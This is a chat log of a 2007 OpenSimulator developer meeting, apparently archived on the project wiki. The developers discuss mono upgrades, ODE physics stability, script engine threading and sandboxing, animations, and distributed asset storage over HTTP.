[10:38] Charles Krinkeb: Should I plan on updating the UGAS for OSGrid to mono-1.2.4?
[10:38] Neas Bade: but more just "here are some things people will look at"
[10:38] Neas Bade: progress is made as best it can be
[10:38] Nebadon Izumi: charles i thik that would be very good
[10:38] lmmz say, My regions are on FF with forced 1.2.5.
[10:38] Wright Juran: making 0.5 a target release of sometime this year, is really in opensim terms sticking to release often, as our first release (0.4) took what 8 months?
[10:38] Charles Krinkeb: I need mw's opinion, I know everyone elses.
[10:38] You: ok .. I plan to introduce a generic REST client, which can be reused to query rest servers
[10:38] Neas Bade: :)
[10:38] Neas Bade: great tleiades
[10:39] Neas Bade: danx0r what kind of help do you need on the physics front?
[10:39] Wright Juran: Charles, opinion on mono? I think the others are in a better position to say, as they use mono more than me
[10:40] You: I think it is safe to move mono requirements up to 1.2.4, now gutsy has been released
[10:40] Neas Bade: also, some of the other folks here on IBM are looking at helping to fill out the LSL implementation. No promisses on speed, as it is all free time stuff, but hopefuly more patches from folks like Illumious coming
[10:40] You: I remember we discussed the fact that ubuntu was stuck on 1.2.3
[10:40] Charles Krinkeb: If no one objects, I will begin heading in the direction of updating OSGrid from mono-1.2.3.1 to mono-1.2.4 over the next week or so.
[10:40] Neas Bade: yeh, 1.2.4 is probably recommended new version
[10:40] Charles Krinkeb: If no one objects, I will begin heading in the direction of updating OSGrid from mono-1.2.3.1 to mono-1.2.4 over the next week or so.
[10:40] Nebadon Izumi: very good
[10:40] Neas Bade: sounds good cfk
[10:40] Wright Juran: sounds good
[10:40] Nebadon Izumi: i think thats great charles
[10:41] lmmz say, sounds good!
[10:41] Neas Bade: danx0r you still in world?
[10:41] Nebadon Izumi: also since Rookiie is here we should acknowledge his really amazing Grid Web Interface
[10:41] Neas Bade: oh, another thing, MW posted a great glossary explanation on the mailing list
[10:41] Nebadon Izumi: he really did a great job
[10:42] Charles Krinkeb: Does the top 10 bug list on the wiki make sense to everyone? Add to it as appropriate. But, only 10 on the list max.
[10:42] Nebadon Izumi:
[10:42] lmmz say, Great job, Rookiie!
[10:42] Neas Bade: is there a volunteer to build a glossary in the wiki based on that post?
[10:42] Neas Bade: yes, great job on opensimwi
[10:42] You: I love the top 10 bug list
[10:42] Charles Krinkeb: sdague, mw. I would like to adopt this, but have some issues with modifying the users table. I dont want to make it incompatible with OpenSim on OSGrid.
[10:43] Wright Juran: of course though I am for 0.5 being a big release, the problem with big releases in a open source project are that when there are busy months for the developers (on non project releated things) it does effect the release more than if it was a small feature release
[10:43] Neas Bade: I think the top 10 bug list is definitely a good thing
[10:43] Sakai openlifegrid: perhaps an intermediate release is more appropriate?
[10:44] Sakai openlifegrid: drawing on ur 0.4.x idea
[10:44] Nebadon Izumi: Does anyone think that adding fields to the user table have any adverse effects on grid mode functionality?
[10:44] Neas Bade: Charles, I think perhaps it would be good to email out the top 10 bug list to the mailing list o na weekly basis
[10:44] danx danx0r: are we agreed that ODE goal is no more ugly crashes?
[10:44] You: cfk... if you can send me the table defs, I can have a look at updating the table layout
[10:44] Neas Bade: danx0r I agreed
[10:44] Nebadon Izumi: i personally dont see how it could effect it but would like others opinions
[10:44] danx danx0r: as opposed to focusing on niceties like not bouncing 500 meters
[10:44] You: yes
[10:44] paulie Femto: yep
[10:44] Sakai openlifegrid: :)
[10:44] danx danx0r: ok I may put in hax to basically reset physics if I get that exception
[10:44] You: crashing is worse than things not working right
[10:44] Nebadon Izumi: Tleiades maybe you can just download the opensimwi
[10:44] Charles Krinkeb: done, Neas. Next subject, I will put my concerns about adopting opensimwi on the mailing list also. I need some technical guidance before I modify the users table.
[10:45] Nebadon Izumi: and have a look
[10:45] danx danx0r: so instead of crashing it will just zero velocities and make positions sane
[10:45] Sakai openlifegrid: def
[10:45] Neas Bade: I think the problem with 0.4.x releases is "what have we done that provides incremental benefit to 0.4 that's as reliable as the features in 0.4"
[10:45] You: ok
[10:45] danx danx0r: I remember why I didn't do it before: this is a C++ hack
[10:45] Neas Bade: 0.4 was very solid for what it supported
[10:45] Sakai openlifegrid: well what would be your targets for a 0.4.x?
[10:45] Sakai openlifegrid: over a 0.5?
[10:46] Neas Bade: danx0r how can I help on the physics debug front?
[10:46] Wright Juran: yeah true, if we did 0.4.X releases they really would be peacemeal 0.5 releases rather than mantiance releases on 0,4
[10:46] Sakai openlifegrid: ie. stable ODE etc =0.4.x then 0.5 inv assets grid?>
[10:46] Neas Bade: let's not worry about releases per say over the next month and just push on hard on the grid and physics stability fronts
[10:46] You: yes, I think we agreed not to invest too heavily in branching in svn
[10:46] Wright Juran: agreed
[10:47] Neas Bade: sakai, I don't think you could back port what we have really
[10:47] Sakai openlifegrid: ok
[10:47] Neas Bade: face, it, I'm the one that beat everyone up a lot to get 0.4 out the door :)
[10:47] danx danx0r: neas - issue is this means we are forking ODE
[10:47] Neas Bade: so if I see everyone getting complacient, I'll start beating up again :)
[10:48] Sakai openlifegrid: ;)
[10:48] Nebadon Izumi: hehe
[10:48] Wright Juran: I think most people still run from svn version anyway so releases aren't so much a issue just yet, and we have the nightly builds
[10:48] danx danx0r: since we need to change ODE's exception handling logic
[10:48] Neas Bade: ok
[10:48] Sakai openlifegrid: true we only use ur svn;s
[10:48] danx danx0r: I'm OK with that, I think it's enevitable whichever engine is used
[10:48] Neas Bade: well, do you think that is more or less sensible than digging on bullet?
[10:48] danx danx0r: just means have to merge if we want new ODE versions
[10:49] Wright Juran: how far is Bullet from being up to ODE level ?
[10:49] danx danx0r: neas -- I think it's sensible to get ODE stable, then move to bullet after 0.5
[10:49] Wright Juran: ah ok
[10:49] danx danx0r: Wright -- it needs quite a bit of work
[10:49] Nebadon Izumi: i dont think its even close
[10:49] Nebadon Izumi: bullet is very unstable
[10:49] danx danx0r: and we need to detangle some things from the ODE plugin
[10:49] Neas Bade: ok, so probably we'll want to create a sepereate opensim-ode repo
[10:49] danx danx0r: I've also seen bullet eat up ALOT of cpu
[10:49] Sakai openlifegrid shudders
[10:49] danx danx0r: and ODE so far has seemed surprisingly light on CPU from what I've heard
[10:49] Neas Bade: ok, fair enough
[10:50] Sakai openlifegrid: I could do some comparisons if you like
[10:50] Neas Bade considers danx0r the physics master
[10:50] danx danx0r: I agree long-term bullet looks good, but it's new -- almost no docs
[10:50] danx danx0r: and despite our issues, I suspect ODE is more stable due to maturity
[10:50] Sakai openlifegrid: (physical)
[10:50] Wright Juran: are we still going with c# bullet or as I saw danx suggest before, a wrapper on c/c++ Bullet?
[10:50] danx danx0r: and BTW there is still active ODE developers -- note they moved from 0.8 to 0.9 in a few months
[10:50] Neas Bade: ok, good to knwo
[10:51] danx danx0r: and finally, it's simply the case that I'm very familiar with ODE and not with Bullet
[10:51] Neas Bade: so presumably we'd start with 0.9, and modify the exception handling?
[10:51] danx danx0r: and so far new physics coders have not stepped up to fulltime involvement
[10:51] danx danx0r: tho gerard is doing excellent work on meshing prims
[10:51] Wright Juran: yeah so sticking with ODE seems the best (as you are doing most of the work, think we should stick with whatever you think)
[10:52] danx danx0r: neas - yes, since ODE is now in opensim-libs, I feel comfy hacking on it
[10:52] Neas Bade: ok, sounds good
[10:52] Tleiades Hax has confidence in danx0r's work
[10:52] danx danx0r: only thing is when it gets hacked, we have to update binaries in opensim/bin
[10:52] danx danx0r: agreed then. I may be quiet for a bit, stressful workday
[10:52] Neas Bade: I'll probably bug you a bit more on IRC about getting up to speed on physics so I can help there
[10:52] danx danx0r: neas -- great, later this aft will be better
[10:53] danx danx0r: boss is right here, wondering why I'm complaining he blocks UDP ports
[10:53] Nebadon Izumi: lol
[10:53] danx danx0r: btw corporate firewalls -- opensim shuld be better than LL
[10:53] Neas Bade: yep, probably tomorrow actually, as I have municipal wireless meeting in RL after this
[10:53] danx danx0r: we should have TCP connect, check for UDP/ports
[10:53] danx danx0r: like video streamers do
[10:53] Wright Juran: tell him that opensim is a great robot simulator enviorment (or will be)
[10:53] danx danx0r: maybe a TCP backstop?
[10:53] Neas Bade: 4 SL meetings and 1 RL meeting in one day makes for little real work :)
[10:53] danx danx0r: well it does help me with physics, which I use on the job
[10:53] danx danx0r: but it's a tentative argument at best
[10:54] danx danx0r: any comments from you net wizards on TCP/firewalls?
[10:54] You: I think we are limited by the viewer
[10:54] Neas Bade: danx0r I think that we'll get a bunch of that as the Linden environment evolves
[10:54] Sakai openlifegrid: we haven't run into any issues with the opensim
[10:54] Neas Bade: yeh, it's view issues right now
[10:54] You: I think all opensim code uses tcp
[10:54] danx danx0r: d'oh of course it's a client-side issue
[10:55] danx danx0r: 'nother reason for our own client...
[10:55] Neas Bade: from all the Linden talk that I've heard, the viewer will be able to opperate in TCP mode in a years time
[10:55] You: though I have been thinking that the current inter region protocol is in efficient
[10:56] Wright Juran: yeah, custom client ++. Think sooner or later someone will start work on one (even if we don't)
[10:56] Sakai openlifegrid: I've opnly seen small hacks on the LL Client
[10:56] Neas Bade: I've always been -- on custom client, as I think we gain a lot from compatibility :)
[10:56] You: ++ on sean's comment
[10:57] You: we live on the ll viewer
[10:57] Neas Bade: at least until we're a bit further on the back end implementation
[10:57] Wright Juran: Tleiades, I think all our inter-X protocols are inefficient, thats what I mean by thinking we need to do major work on the protocols
[10:57] Neas Bade: that would be a good ML discussion
[10:58] Wright Juran: yeah but there are a lot of things that the LL viewer is no right for, a lot of things don't need all the bloat in it for example
[10:58] Neas Bade: silly flying people
[10:58] Nebadon Izumi: hey tedd
[10:58] Neas Bade: ah, it's tedd
[10:58] Neas Bade: hey tedd
[10:58] Sakai openlifegrid: is hipihi based on the LL client?
[10:58] Nebadon Izumi: ted
[10:58] Nebadon Izumi: carefull man
[10:58] Neas Bade: hwo is the script engine coming?
[10:59] Nebadon Izumi: your gonna crash the server
[10:59] Wright Juran: so while yes I don't think we should stop being compatiable with the SL viewer, I do think having a custom client that uses the same protocol would be good
[10:59] Nebadon Izumi: just leave it tedd
[10:59] Tedd Maa: just checking ;)
[10:59] Nebadon Izumi: not during meetings please
[10:59] Neas Bade: yeh, we had one crash earlier, so trying to not upset things too much :)
[11:00] Tedd Maa: server crashes when you move object?
[11:00] Tedd Maa: hmm... I didn't know that :)
[11:00] Charles Krinkeb: Tedd, sometimes.
[11:00] Nebadon Izumi: ode collisons
[11:00] Wright Juran: yeah Tedd, just get on with your excersises, if you come to gym class, you have to work
[11:00] Neas Bade: hehehe
[11:00] Tedd Maa: ok, so I admit it, I'm the master SL griefer
[11:00] Neas Bade: so, Tedd, how goes the script engine work?
[11:00] Charles Krinkeb: Ref: 333Mbyte, 67% CPU, 13 avatars
[11:01] Sakai openlifegrid: ouch
[11:01] Nebadon Izumi: nice charles
[11:01] Neas Bade: sakai, remember, there is like 0 optimization yet
[11:01] Nebadon Izumi: 67% seems high
[11:01] Charles Krinkeb: I suspect the 67% has more to do with locks then anything else.
[11:01] Sakai openlifegrid: yes it dows
[11:01] Sakai openlifegrid: does
[11:01] Tedd Maa: well, it kinda stopped last week again ... temporarily. The good news is that I'm able to participate on IRC and write some code now and then
[11:01] Nahona Nakamori: mmm... about scripting... somebody heavy in lsl scripting already thinked to attempt to make a prims rezzer for LL grid using xml export from opensim? could be fun to can use opensim in sandbox for offline building...
[11:02] Tedd Maa: as compared to a few weeks/a month ago when I only had time to do some scetch-book planning
[11:02] Sakai openlifegrid: true
[11:02] Charles Krinkeb: Nahona: Mantis feature request would be best for this, I believe.
[11:02] Neas Bade: cool
[11:02] Sakai openlifegrid: I know someone I can ask
[11:02] Neas Bade: does anyone know how I can get mantis to send me email on changes to anything, like it says it is doing?
[11:02] Neas Bade: but isn't
[11:02] Tedd Maa: Current status is: I have implemented TCP server/client. I am designing a binary protocol and have sort of started implementing what I call the "Packet factory" (the class that makes the binary packets)
[11:03] lmmz say, nice
[11:03] Tedd Maa: I have created a separate stand-alone for script engine called script server and moved (copied) ScriptEngine to it.
[11:03] Neas Bade: cool
[11:03] Wright Juran: Neas, it used to send updates if a issue was assigned to you, but don't think it has done that for months now
[11:03] Tedd Maa: But because ScriptEngine needs scene and the comm is not operational yet it will not compile
[11:03] Neas Bade: any best guess on when it might go into tree?
[11:04] Tedd Maa: in fact there are a lot of things that will not compile
[11:04] Tedd Maa: its at least 2-3 weeks depending on my spare time
[11:04] Neas Bade: Wright: that's sort of problematic
[11:04] Tedd Maa: OpenSim has first priority on my spare time activites
[11:04] Neas Bade: cfk, any chance you can beat up openmv folks on that front?
[11:05] Neas Bade: cool :)
[11:05] Charles Krinkeb: Huh? What front, sorry
[11:05] Neas Bade: mantis not sending email
[11:05] Tedd Maa: I have started talking to Babbage, he seems interested in the new Script Engine approach
[11:05] Charles Krinkeb: Sure. CPrior is my contact, I will see what I can do
[11:05] Neas Bade: nifty
[11:05] Tedd Maa: he also says we should not attempt implementing microthreading
[11:06] Tedd Maa: and I have been thinking a lot about it and I agree ... there are so many problems that we should not start it, it is just dead wrong from a design perspecitve
[11:06] You: Tedd.. I have a question, are you using interpreted code or CIL?
[11:06] danx0r say, is my av still there? battery died
[11:06] Neas Bade: that's definitely progress
[11:06] Wright Juran: haven't they implemented microthreading in their mono implementation?
[11:06] Charles Krinkeb: Cprior-gram sent re Mantis-non-mail.
[11:07] Tedd Maa: right now I am using C# for everything, I was using CIL on the LSL ByteCode
[11:07] You: well... two things
[11:07] Tedd Maa: If I can speak on a purely personal level.. I think we'll find that LL will not implement C# ...
[11:07] You: 1) won't injecting thread.sleep and threadpools be just as good as microthreading?
[11:07] Neas Bade: right, I think we'll still need the LSL implementation
[11:08] You: and .. what about security, CAS doesn't work on mono
[11:08] Neas Bade: I think there was confusion over them adding Mono
[11:08] Neas Bade: vs. C#
[11:08] Charles Krinkeb: I might have to boogie, but will do the chat log onto the wiki later.
[11:09] Sakai openlifegrid: Ciao Charles
[11:09] You: bye cfk
[11:09] Neas Bade: Tedd, presumably the new script engine doesn't preclude using LSL like the current model?
[11:09] lmmz say, cya
[11:09] Wright Juran: yeah I'm going to have to go too, will stay logged in , but not really here
[11:09] Neas Bade: later cfk
[11:09] Tedd Maa: Answers: 1) Then we can not move running scripts between servers or pack them into inventory. BUT, with new ScriptServer we can at least have script moved between regions... then next problem is that you can only have a few hundred threads per operating system
[11:09] Tedd Maa: or, per computer
[11:09] Charles Krinkeb: 14 avs, 68% CPU, 340Mbyte
[11:10] Tedd Maa: Security is a big problem... it is THE reason why I think we will not see C# and Mono in SL for a long time
[11:10] danx0r say, why is it so hard to sandbox mono code?
[11:10] danx0r say, isn't that the whole point of a managed bytecode?
[11:11] Tedd Maa: The technical side with microthreading can be solved with a lot of work, although its one of those "its possible in theory but nobody would ever be so mad as to actually ytry it" implementations [11:11] You: danx0r it gets jitted [11:11] You: but what about mint? [11:11] Tedd Maa: It would be easier to implement a virtual machine with a minimal OS that can run Mono and run scripts inside it instead with 1 thread per OS [11:11] danx0r say, so tedd -- you have a thread for every script now? Doesn't LL do some sort of smart sleep() injection [11:11] Tedd Maa: *1 thread per script [11:11] danx0r say, ahh, frakkin JIT [11:12] danx0r say, well it must be hard, because Guido punted on it in Python, and he doesn't even use JIT [11:12] danx0r say, he just pulled the module and said you're all on your own, I absolve myself of any and all liability for security problems [11:12] Tedd Maa: one can in theory microthread Mono, and it might be that LL already has done that ... but the security aspect of it is just impossible [11:12] danx0r say, 1 thread per script is not scalable, ne? [11:13] danx0r say, there's microthreads for python sorta, but I'm talking about trusted execution [11:13] Tedd Maa: no, 1 script per thread won't work... operating systems have a big overhead for each thread [11:13] danx0r say, I guess these issues intersect [11:13] Sakai openlifegrid: it's kill a bit of hardware [11:13] danx0r say, I remember something from LL about smart yield() injection [11:13] Tedd Maa: I'm thinking of looking into JavaScript [11:13] Neas Bade: I wonder how many mono threads you can have on linux before things get wonky [11:14] danx0r say, which is a form of microthreading, morally speaking [11:14] Neas Bade: tedd, do you have a good test case to test practical limits? 
[11:14] Tedd Maa: Babbage tested that, a few hundred on Linux and close to a hundred on Win [11:15] Tedd Maa: but Windows NT has something called "fibres", but I think maybe the app has to support it somehow [11:15] You: threads have almost the same overhead as processes [11:15] Neas Bade: not on linux [11:15] Tedd Maa: I've been looking at yield, but I'm not sure if we should go down that path at all [11:15] danx0r say, yield() seems like the right thing [11:16] danx0r say, I did something on Python where I just inserted a yield after every line of code [11:16] danx0r say, wasn't scaled up, but it could have been I think [11:16] danx0r say, the idea is to insert a yield anywhere you have a CPU capture [11:16] Neas Bade: yield actually causes some interesting issues with the os schedulars from my previous experience [11:16] danx0r say, it's part of the theory of continuations [11:17] danx0r say, neas -- it doesn't have to be an OS yield [11:17] Neas Bade: anyway, I've got to run to this wireless meeting [11:17] Neas Bade: see you all later [11:17] Neas Bade: thanks for so many people showing u [11:17] Neas Bade: up [11:17] danx0r say, sorry I need to be more specific. Yield() in python is a python thing, it returns control to the VM [11:17] Sakai openlifegrid: Ciao Neas thanx [11:17] lmmz say, cya! [11:17] Tedd Maa: well, IF Linux can support say 500 threads ... this means we can have 500 scripts with loops in them. or we could have 499 scripts with loops and 10.000 scripts without loops [11:17] danx0r say, antont: that sucks -- wonder why [11:17] Tedd Maa: if you see my point [11:18] Neas Bade: well, that might be a fine place to start [11:18] danx0r say, so mono doesn't have a microthreading capability or python-like yield() next() ?? 
[11:18] Neas Bade: its 500x better than where we are now :) [11:18] Tedd Maa: and with remote script server we can cluster multiple script servers to serve one region, meaning we can without any big problem run 10k's of scripts [11:18] danx0r say, if so that's too bad. I guess python is strictly runtime interpreted so it's easier [11:18] Tedd Maa: mono has yield(), but there are problems ... [11:18] Neas Bade: and 20x slower [11:19] sdague say, �ACTION goes poof� [11:19] Tedd Maa: 01 41 43 54 49 4F 4E 20 73 61 79 73 20 73 6F 6D .ACTION says som 65 74 68 69 6E 67 20 6F 6E 20 49 52 43 01 00 ething on IRC.. [11:19] Tedd Maa: wow [11:19] Tedd Maa: what happened there? :P [11:19] Nebadon Izumi: lol [11:20] Sakai openlifegrid: Mono microthreading only works with the subset of CIL > assembler opcodes that the LSL to CIL compiler emits [11:20] You: tedd.. wouldn't threadpooling work? [11:20] Tedd Maa: point is that there are a lot of small obstacles to overcome to implement Mono microthreading, some are of those that can be overcome, while others are not [11:21] Blue Mouse: couple questions about other topics??? [11:21] Tedd Maa: "open up everything, allow anyone to run any .Net app on my computer. Now try to restrict the application." <- its just the wrong way to go [11:22] Nebadon Izumi: whats your questions blue? [11:22] Blue Mouse: what needs to be done to make animations work? [11:22] Tedd Maa: threadpooling can work to some degree now that we have script server as stand alone, but when its integrated into OpenSim its very dangerous [11:22] You: why not have it as a standalone server? [11:23] Sakai openlifegrid: well that would def be a good point from a hardware pool side [11:23] Tedd Maa: it will be, but threadpool works as "if you are kind enough to lend me back my thread so I can continue execution" [11:23] Gareth say, ooh, Wright Plaza is back up? 
[11:23] lmmz say, Blue: the last thing I heard was that we need someone to make opensource versions of the LL animations? Is that wrong? [11:23] Tedd Maa: that is not so cool :) [11:23] Nebadon Izumi: yes gareth it was only down for about 1 minute [11:24] Gareth say, i picked the wrong minute [11:24] You: which is where emitting thread.slepp(0) comes into play [11:24] Blue Mouse: there were a bunch of animations packaged with avimator [11:24] Gareth say, heh [11:24] Nebadon Izumi: ah thats not so hard [11:24] Gareth say, i'll hop on [11:24] You: similar to the yield() [11:24] lmmz say, Blue: someone was looking into the "sit" today. [11:24] Blue Mouse: can't remember what the license was... [11:24] Blue Mouse: sit would be a good starting point [11:24] Sakai openlifegrid: yeah i've got afew bucket fulls of animations too [11:24] Nebadon Izumi: chillken was working on sit [11:25] You: BSD license is important [11:25] lmmz say, I recall reading in backscroll on #opensim-dev that sit was being looked into. [11:25] Nebadon Izumi: yea lmmz it was chi11ken [11:25] Sakai openlifegrid: hehe irc delat [11:25] Sakai openlifegrid: delay [11:25] lmmz say, I dont know if the animations are part of the client or are downloaded from LL. [11:25] Tedd Maa: in initial implementation of script engine we will have thread based execution of scripts. It is not a 1:1 ratio between thread and script. If the script is not working then no thread is assigned to it. [11:25] Nebadon Izumi: they are an asset [11:25] Nebadon Izumi: i beleive [11:25] Tedd Maa: so if you have 10.000 scripts waiting for an event then no threads are in use. [11:25] Nebadon Izumi: not in client [11:26] Blue Mouse: asset yes, but i thought they were executed on the client [11:26] lmmz say, the client contains an xml file with keys to LL animations, but I imagine we dont want to use LL's animations. :) [11:26] Blue Mouse: haven't looked into it too deeply thought [11:27] Blue Mouse: are the animations on the client? 
can we just send the right keys? [11:27] Blue Mouse: isn't that how walk works now? [11:27] Nebadon Izumi: no [11:27] Nebadon Izumi: its a animation [11:27] Nebadon Izumi: an asset [11:27] lmmz say, I dont think they're on the client unless youve downloaded em from LL grid. [11:27] Nebadon Izumi: animations are not in the client [11:27] Gareth Nelson shouts: where abouts are you all? [11:28] Nebadon Izumi shouts: upstairs in the building Gareth [11:28] lmmz say, I've seen some custom animations play locally in OpenSim, but they dont play inworld, yet. [11:28] You shout: upstairs [11:28] Gareth Nelson: this looks like a crazy cult meeting [11:28] You: one more thing to put on the list :) [11:28] Gareth Nelson: it's like smith in the matrix, but ruth [11:28] lmmz say, hopefully, chillken (?) will make some progress on it, today. :) [11:28] Blue Mouse: correct... there are three animations in opensim right now... hard coded case statement for walk, fly and something else [11:29] Blue Mouse: ok [11:29] lmmz say, walk, fly and gym class? [11:29] Blue Mouse: something like stop flying but i can't remember [11:29] Nebadon Izumi: yea in the Data folder [11:30] Nebadon Izumi: there is an xml file [11:30] Nebadon Izumi: that defines the animations [11:30] Nebadon Izumi: and their asset UUID [11:30] lmmz say, Blue, chi11ken is probably the one to work with on animations. [11:30] Blue Mouse: will do [11:30] Gareth Nelson: are people seeing my shape changes? [11:30] You: great .. I'd love to see more animations [11:30] Sakai openlifegrid: a busty woman? [11:30] lmmz say, Gareth, yes. Nice headlights. [11:31] Nebadon Izumi: rofl [11:31] Nebadon Izumi: i got a screenshot [11:31] Nebadon Izumi: thats going on the wiki [11:31] Gareth Nelson: my sexy av? [11:31] Nebadon Izumi: lol [11:31] Sakai openlifegrid: u can currently accept animations direct from avimator?
[11:31] Gareth Nelson: amongst you mere mortal ruths [11:32] Gareth Nelson: why are animations hardcoded? [11:32] Nebadon Izumi: yea one problem is animations in your inventory [11:32] Nebadon Izumi: only you can see them [11:32] Nebadon Izumi: it doesnt animate to world [11:32] Blue Mouse: i can put animations in my library (from avimator) [11:32] Blue Mouse: i can even play them locally [11:32] Blue Mouse: can't play them in world though [11:32] Nebadon Izumi: yea only works locally [11:32] lmmz say, Sakai, I think so, yes. But without an asset system, they would not stay in inventory. And they only play locally. [11:32] Nebadon Izumi: yea [11:32] You: assets isn't implemented fully and completely [11:32] Sakai openlifegrid: lol - so true [11:32] Nebadon Izumi: yea that should be done 1st [11:33] Nebadon Izumi: before doing to much with animations [11:33] Sakai openlifegrid: I think I'll contact ch11ken then I have a ton he can have straight up [11:33] You: first the infrastructure for assets and inventory needs to be set up [11:33] lmmz say, Sakai, nice. [11:33] Sakai openlifegrid: my borther has made 100's for SL [11:33] Nebadon Izumi: but you should talk with him [11:33] Nebadon Izumi: as assets is not far off [11:33] Nebadon Izumi: few weeks [11:33] Sakai openlifegrid: well that's exciting [11:34] lmmz say, I suppose we get to decide how assets are persisted between grids, after that. :) [11:34] Blue Mouse: speaking of assets... any idea when i can put textures in a prim? (looking to build a projector for biz meetings) [11:34] Gareth Nelson: the viewer fetches assets over HTTP now - does anyone know how to provide them? [11:34] Tedd Maa: ok, I'll be on IRC .. need to do some more work :) [11:34] lmmz say, Cya, tedd! [11:35] Tedd Maa: you all have a nice workout [11:35] Sakai openlifegrid: yes persistent between grids would be impressive but could really dig the bandwidth [11:35] Sakai openlifegrid: Gareth going for hot nurse? 
[11:36] You: well, I have been thinking about writing a client side asset and inventory storage engine [11:36] You: that way, the inventory and assets could follow the user between grids [11:36] Sakai openlifegrid: but [11:36] lmmz say, I Gotta run! Great meeting! The IRC bridge is the shiz! [11:36] Sakai openlifegrid: how would you get around duplicate asset entries? [11:37] You: I wouldn't and I wouldn't care, as long as they have the same I'd :-) [11:37] Sakai openlifegrid: hehe [11:37] Stefan Andersson: I'd suggest we look into URI instead of LLUUID for resources [11:37] Gareth Nelson: i now pwn all you ruths! [11:38] Nebadon Izumi: lol [11:38] Gareth Nelson: so..... HTTP textures at the very least works direct to viewer [11:38] Gareth Nelson: anyone know the details on that? [11:38] Gareth Nelson: and can the sim FORCE the viewer to take them? [11:38] Sakai openlifegrid: well that would be aboon [11:38] You: Stefan .. that is the obvious choice.. but it won't fit with the viewer [11:38] You: but ... [11:38] You: Stefan .. that is the obvious choice.. but it won't fit with the viewer [11:38] You: I have been thinking [11:39] You: since the asset server will be rest [11:39] Stefan Andersson: No, but rather than rewriting a whole client-side asset system, I'd say the effort would be better spent trying to hax URI [11:39] You: and lsl supports http [11:39] You: we could implement some extensions [11:39] Sakai openlifegrid: this may be easier [11:39] You: which could be accessed using lsl [11:40] You: url's for assets really is the obvious choice [11:40] You: we know the internet is a scalable storage device :) [11:41] Sakai openlifegrid: most certainly... [11:42] Sakai openlifegrid: could you possiblly translate a uuid to a url and pass it through [11:42] Sakai openlifegrid: ? [11:42] Stefan Andersson: I'm pretty sure it would be possible to create a asset guid-to-uri conversion scheme. 
[11:42] You: now if only we could get some people who understood grid computing to look at simulator code [11:42] You: yes [11:42] You: and the mapping could be tweaked by lsl using a rest interface [11:42] Testc User: there are existing uuid uri schemes (well i know one) [11:43] Stefan Andersson: Also, you have this thing with the assets going thru the simulator, which is authenticated [11:43] You: I'm not too hot on the concept of "authenticated users" for the final release [11:43] Stefan Andersson: If every object had a 'namespace' uri attached to it, you'd just attech the asset guid to that [11:44] Sakai openlifegrid: rfc4122 [11:44] Sakai openlifegrid: (uuid to uri) [11:45] Gareth Nelson: The concept of authenticated users is a must Tleiades: i am hot on the idea of authenticating users or allowing guests [11:45] Gareth Nelson: i'm VERY hot on guests [11:45] You: I think the HTTP approach is better [11:45] Gareth Nelson: i'm also hotter than all of you! [11:45] You: lols [11:46] Gareth Nelson: Tleiades: were you referring to authenticating users for asset downloading? [11:46] Gareth Nelson: or for login and authentication against a DB for standalone mode? 
[11:46] You: yes, and accessing regions [11:46] Blue Mouse: if the client grabs the asset using a URL and HTTP then authentication could bypass the simulator altogether [11:46] You: anonymous access is important I think [11:46] Gareth say, heh, you can't see it but my avatar there is the sexiest one [11:46] Blue Mouse: that could be good (simulator doesn't have to proxy client credentials) [11:47] lbsa71 say, Well, if we wanted distributed assets, we could do them quite easy today, I guess; [11:47] Blue Mouse: and bad (what if you aren't allowed to get an asset you need) [11:47] Gareth Nelson: authentication for assets should be done using either CAPs direct to viewer or proxied via the sim [11:47] You: I worry about the asset server [11:47] You: I don't think a single central asset server is going to cut it [11:47] Nahona Nakamori: are you sure Gareth? [11:47] Nahona Nakamori: lol [11:47] Gareth Nelson: question - why not do it the way it's being proposed on the SL wiki for the AW Groupies? [11:48] lbsa71 say, If all users had an 'home root url' then all assets could be funneled to that. [11:48] Gareth Nelson: in fact, are any other groupies here? [11:48] Stefan Andersson: Ok, gotta go. [11:48] You: I gave up on the AWG [11:48] Stefan Andersson: Cheers [11:48] Gareth Nelson: ok, Nahona has a mildly better face.... [11:48] Gareth Nelson: Tleiades: the AWG is getting too beuracratic for my liking [11:48] Sakai openlifegrid: i would agree on the single asset server [11:49] Nahona Nakamori: Nahona uploaded her personal realistic skin *lol* [11:49] You: yeah .. should get coding on the rest client [11:49] Gareth Nelson: but some good ideas have been generated [11:49] Gareth Nelson: i'll discuss the details on IRC rather than here (laggy as a laggy lagfest) [11:49] You: yes.. 
I just think that most of the talk was too high level, and of very little practical use [11:49] Sakai openlifegrid: I have to say thank you to everyone for your warm welcome [11:49] Sakai openlifegrid: I must sleep [11:50] You: and opensim is very much about pratical approaches [11:50] Gareth Nelson: but basically the agent domain stores all an agent's belongings, region domain stores all the rez'ed objects [11:50] Gareth Nelson: Tleiades: agile :) [11:50] Gareth Nelson: and inventory can come from an aggreator [11:50] Nahona Nakamori: night Sakai [11:50] You: nite [11:50] Sakai openlifegrid: nite [11:50] Gareth Nelson: at login the user gets a big list of inventory sources, every asset is a link to where the asset can be downloaded [11:51] You: Gareth .. we have to live with the viewer .. as it is today [11:51] You: but I think cap's can be used to distribute load [11:51] Gareth Nelson: hmm yeah - not an option to alter anything viewer side in opensim [11:51] Gareth Nelson: the sim can still act as a proxy and do most of the new architecture though [11:52] You: yes.. that is my thinking [11:52] You: my thinking is like this [11:52] Gareth Nelson: brb - keep talking [11:52] Gareth Nelson: and stop staring at my breasts Nahona ;) [11:52] You: the viewer is directed to the url of the assets [11:52] Rookiie Roux: lol [11:52] Nahona Nakamori: arf [11:52] Rookiie Roux: gareth [11:52] You: and is basically told to look at 127.0.0.1 [11:53] You: where we have a client side component, transfer the asset [11:53] Blue Mouse: umm... 
how about just running a sim on every client that represents "home" territory [11:53] Blue Mouse: then proxy other requests through that sim [11:53] You: if the asset isn't found at the clientside asset server, the client side asset server goes to the network at dl it [11:54] Nahona Nakamori: not my fault Gareth if all ruth breasts are not so much hot *lol* [11:54] Nebadon Izumi: lol [11:57] Tedd say, I'm kinda glad animations haven't been implemented yet or you'd be having an orgie right about now [11:57] Tedd say, but hey, words can be just as exciting, right? ;) [11:57] You: does anybody have the full log of the meeting? [11:58] Nebadon Izumi: IRC does [11:58] Tedd say, I came late, but I do log [11:58] Nebadon Izumi: we can remove all the nonsense [11:58] Nebadon Izumi: hang on [11:58] Nebadon Izumi: i'll hook it up [11:58] You: I lost mine at the crash [11:59] You: Neb... will you post the log on the wiki? [11:59] Nahona Nakamori: rofl tedd, yeah sure and in my viewer i read (Mature) at the Menu bar, so NO PROBLEM lol
http://opensimulator.org/index.php?title=Chat_log_from_the_meeting_on_2007-10-23&oldid=1236
